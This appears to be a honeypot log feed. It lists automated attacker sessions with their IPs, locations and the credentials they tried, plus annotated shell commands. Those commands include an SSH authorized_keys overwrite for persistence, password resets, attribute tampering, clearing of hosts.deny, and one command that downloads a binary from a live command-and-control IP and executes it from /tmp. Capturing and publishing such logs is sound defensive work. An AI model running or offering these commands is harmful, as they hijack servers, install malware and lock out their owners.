$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "123456a@\njLD0J8mZDTQp\njLD0J8mZDTQp"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "123456a@\njLD0J8mZDTQp\njLD0J8mZDTQp\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "123456a@\nXp65QbUJuYTF\nXp65QbUJuYTF"|passwd|bash
$ echo "123456a@\nXp65QbUJuYTF\nXp65QbUJuYTF\n"|passwd
$ echo -e "12345\nTksW1eSJgGGC\nTksW1eSJgGGC"|passwd|bash
$ echo "12345\nTksW1eSJgGGC\nTksW1eSJgGGC\n"|passwd
🎭 ghost_root_124 (115.79.36.23) β€” Ho Chi Minh City, Vietnam Β· 2 sessions Β· 38 cmds
2026-05-06 10:13 EDT Β· as root/123qweasdZXC, root/Abc123456789*
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:gd2PuamemSNv"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:XsBHprovjbZD"|chpasswd|bash
🎭 hanbok_root_22 (211.253.9.160) β€” Seoul, South Korea Β· 2 sessions Β· 2 cmds
2026-05-06 08:35 EDT Β· as root/blackcat
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ uname -a Γ—2 // OS/kernel identification
🎭 lotus_root_20 (43.227.185.238) β€” Noida, India Β· 3 sessions Β· 60 cmds
2026-05-06 09:12 EDT Β· as testuser/12345, ubuntu/123456a@, user/123456a@
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "12345\nqXK5nIYINn7H\nqXK5nIYINn7H"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "12345\nqXK5nIYINn7H\nqXK5nIYINn7H\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "123456a@\nMgCqlMEK0qwH\nMgCqlMEK0qwH"|passwd|bash
$ echo "123456a@\nMgCqlMEK0qwH\nMgCqlMEK0qwH\n"|passwd
$ echo -e "123456a@\nzPQ4DCQLQNP0\nzPQ4DCQLQNP0"|passwd|bash
$ echo "123456a@\nzPQ4DCQLQNP0\nzPQ4DCQLQNP0\n"|passwd
🎭 cowboy_root_62 (40.78.155.180) β€” Des Moines, United States Β· 3 sessions Β· 60 cmds
2026-05-06 09:08 EDT Β· as testuser/12345, ubuntu/123456a@, user/123456a@
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "123456a@\nIKOnvabljuh8\nIKOnvabljuh8"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "123456a@\nIKOnvabljuh8\nIKOnvabljuh8\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "12345\nhGSUzy2ygX9A\nhGSUzy2ygX9A"|passwd|bash
$ echo "12345\nhGSUzy2ygX9A\nhGSUzy2ygX9A\n"|passwd
$ echo -e "123456a@\nKbrzRW8HMj3x\nKbrzRW8HMj3x"|passwd|bash
$ echo "123456a@\nKbrzRW8HMj3x\nKbrzRW8HMj3x\n"|passwd
🎭 clog_root_6 (107.189.27.179) β€” Zaandam, Netherlands Β· 1 session Β· 20 cmds
2026-05-06 09:07 EDT Β· as apache/admin
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "admin\n8aTv6bB4Qa7I\n8aTv6bB4Qa7I"|passwd|bash
$ Enter new UNIX password:
$ echo "admin\n8aTv6bB4Qa7I\n8aTv6bB4Qa7I\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 jade_root_34 (223.75.128.237) β€” Guangzhou, China Β· 1 session Β· 3 cmds
2026-05-06 08:25 EDT Β· as root/password
echo β†’ payload download from C2 β†’ execute from /tmp
$ echo 1 > /dev/null && cat /bin/echo
$ nohup $SHELL -c "curl http://106.12.161.169:7682/linux -o /tmp/vQWcAqYyal; if [ ! -f /tmp/vQWcAqYyal ]; then wget http://106.12.161.169:7682/linux -O /tmp/vQWcAqYyal; fi; if [ ! -f /tmp/vQWcAqYyal ]; then exec 6<>/dev/tcp/106.12.161.169/7682 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/vQWcAqYyal ; chmod +x /tmp/vQWcAqYyal && /tmp/vQWcAqYyal ls4NFkehN6BHFA7d+eDZARBZoTClSRcD3vng2BUXWqcuo14cDd7m5NsbF1mmLqFbCArY5vnfDR9TpzaoWwYK3OT53wkfR6Iyo0cRDtTu59oJBlijOb5cHxXW+eXfARBZoTClSRcL2Png2hUUWL4yo14cDd7m59sbEFm+MqBcCAnb4/nfCBdTqTanXwYK3+P53AoTR6E2pUcUCdTu5d4OBl+gLqJZExXc4+/ADBZTpjOlWwYJ3+/51wsIW6M1vlweAdjn5t4OBliiMb5aFhXc5+TACRJRqjagWBYOzuPlwAofW74xokcUCd/t4d4KFlywMqJaCAzb+ebcAwhbozeqXxYK3uL31hUUWKguolgeFd/v79QNE1qnIKJbFRXf5+7ACRRZvjGnWRwD2O7kzg0XR6E2p0cRD8Dv4dQNFligNbBdERXc4+XAChFQvjSnUxAL2uP32gkIWKkyvlgUFdzl5tQNFligNbBYFwzA4OXAAhNHojKmUxAL3+fizgoUWb4yoFsICt3j+dwJHF+gMaBcBgrf5fncDQhboTK+XxUB2Ofm3g4GWKkwvlAUFdrv+dsMHF+gMaBcBg/d+ebYCghbozC+WxIN1O/m2wgGW6E4vlAWFdzk4sAOHlOmMKFZExva4vnWDwhRqC6iWRAB2OTh3BsXWaYup10ICd/55d0MHF+gMaBcBgPA5ebWFRdYpC6hWBcB1uXg2BsXWKYuoloQFd/n5MAKFlGqNqBYFg7O5O7AChNbvjWlRxQI1u3h3goWXLA0p0cUCNb579sVF16qN6BeHttFRBUSnXQNezN/qwyBjA==; fi; echo password > /tmp/.opass; chmod +x /tmp/vQWcAqYyal && /tmp/vQWcAqYyal ls4NFkehN6BHFA7d+eDZARBZoTClSRcD3vng2BUXWqcuo14cDd7m5NsbF1mmLqFbCArY5vnfDR9TpzaoWwYK3OT53wkfR6Iyo0cRDtTu59oJBlijOb5cHxXW+eXfARBZoTClSRcL2Png2hUUWL4yo14cDd7m59sbEFm+MqBcCAnb4/nfCBdTqTanXwYK3+P53AoTR6E2pUcUCdTu5d4OBl+gLqJZExXc4+/ADBZTpjOlWwYJ3+/51wsIW6M1vlweAdjn5t4OBliiMb5aFhXc5+TACRJRqjagWBYOzuPlwAofW74xokcUCd/t4d4KFlywMqJaCAzb+ebcAwhbozeqXxYK3uL31hUUWKguolgeFd/v79QNE1qnIKJbFRXf5+7ACRRZvjGnWRwD2O7kzg0XR6E2p0cRD8Dv4dQNFligNbBdERXc4+XAChFQvjSnUxAL2uP32gkIWKkyvlgUFdzl5tQNFligNbBYFwzA4OXAAhNHojKmUxAL3+fizgoUWb4yoFsICt3j+dwJHF+gMaBcBgrf5fncDQhboTK+XxUB2Ofm3g4GWKkwvlAUFdrv+dsMHF+gMaBcBg/d+ebYCghbozC+WxIN1O/m2wgGW6E4vlAWFdzk4sAOHlOmMKFZExva4vnWDwhRqC6iWRAB2OTh3BsXWaYup10ICd/55d0MHF+gMaBcBgPA5ebWFRdYpC6hWBcB1uXg2BsXWKYuoloQFd/n5MAKFlGqNqBYFg7O5O7AChNbvjWlRxQI1u3h3goWXLA0p0cUCNb579sVF16qN6BeHttFRBUSnXQNezN/qwyBjA==" & // payload download from C2
$ head -c 3716336 > /tmp/KUaJ7lICSI // execute from /tmp
🎭 dutch_sol_3 (45.156.87.99) β€” Eygelshoven, Netherlands Β· 2 sessions Β· 2 cmds
2026-05-06 07:51 EDT Β· as root/linux, zimbra/zimbra
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m Γ—2
🎭 tulip_root_11 (37.139.4.124) β€” Amsterdam, Netherlands Β· 1 session Β· 1 cmd
2026-05-06 07:14 EDT Β· as root/blackcat
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 dutch_sol (192.109.200.50) β€” Eygelshoven, The Netherlands Β· 1 session Β· 1 cmd
2026-05-06 06:32 EDT Β· as d/d
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m
🎭 ghost_root_125 (222.253.40.231) β€” Ho Chi Minh City, Vietnam Β· 2 sessions Β· 40 cmds
2026-05-06 04:48 EDT Β· as dev/devel123, ubuntu/1qa@WS3ed$RF
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "1qa@WS3ed$RF\nrNL36sFPMUGI\nrNL36sFPMUGI"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "1qa@WS3ed$RF\nrNL36sFPMUGI\nrNL36sFPMUGI\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "devel123\nPaclUTLuFcwQ\nPaclUTLuFcwQ"|passwd|bash
$ echo "devel123\nPaclUTLuFcwQ\nPaclUTLuFcwQ\n"|passwd
🎭 rogue_root_128 (165.154.1.18) β€” Hong Kong, Hong Kong Β· 1 session Β· 20 cmds
2026-05-06 05:06 EDT Β· as user/010101
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "010101\n6tueWBARGj8B\n6tueWBARGj8B"|passwd|bash
$ Enter new UNIX password:
$ echo "010101\n6tueWBARGj8B\n6tueWBARGj8B\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wraith_root_21 (52.237.80.79) β€” Singapore, Singapore Β· 1 session Β· 20 cmds
2026-05-06 04:47 EDT Β· as ubuntu/1qa@WS3ed$RF
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "1qa@WS3ed$RF\nmbVN8kgOqxhb\nmbVN8kgOqxhb"|passwd|bash
$ Enter new UNIX password:
$ echo "1qa@WS3ed$RF\nmbVN8kgOqxhb\nmbVN8kgOqxhb\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 panda_root_49 (115.190.10.158) β€” Haidian, China Β· 1 session Β· 1 cmd
2026-05-06 02:48 EDT Β· as root/Temp1234
file attribute tampering
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
🎭 rogue_root_129 (31.59.89.180) β€” Nola, Italy Β· 1 session Β· 20 cmds
2026-05-06 02:12 EDT Β· as deploy/deploy1234
file attribute tampering
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "deploy1234\nrfN4aagWvoJ0\nrfN4aagWvoJ0"|passwd|bash
$ Enter new UNIX password:
$ echo "deploy1234\nrfN4aagWvoJ0\nrfN4aagWvoJ0\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 chai_root_25 (103.91.246.101) β€” Mumbai, India Β· 1 session Β· 20 cmds
2026-05-06 01:04 EDT Β· as admin/par0t
file attribute tampering
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "par0t\nDRZcCqQEBpkn\nDRZcCqQEBpkn"|passwd|bash
$ Enter new UNIX password:
$ echo "par0t\nDRZcCqQEBpkn\nDRZcCqQEBpkn\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 burger_root_17 (103.143.11.168) β€” Los Angeles, United States Β· 2 sessions Β· 40 cmds
2026-05-05 22:51 EDT Β· as dev/Qwerty@123, ubuntu/ubuntu@4321
file attribute tampering
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "ubuntu@4321\nnU4HlLm1XuFA\nnU4HlLm1XuFA"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "ubuntu@4321\nnU4HlLm1XuFA\nnU4HlLm1XuFA\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "Qwerty@123\n3TfgTKvJY5ri\n3TfgTKvJY5ri"|passwd|bash
$ echo "Qwerty@123\n3TfgTKvJY5ri\n3TfgTKvJY5ri\n"|passwd
🎭 specter_root_112 (45.196.236.141) β€” Hong Kong, Hong Kong Β· 2 sessions Β· 39 cmds
2026-05-05 22:16 EDT Β· as root/testman1, user4/12345
file attribute tampering
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
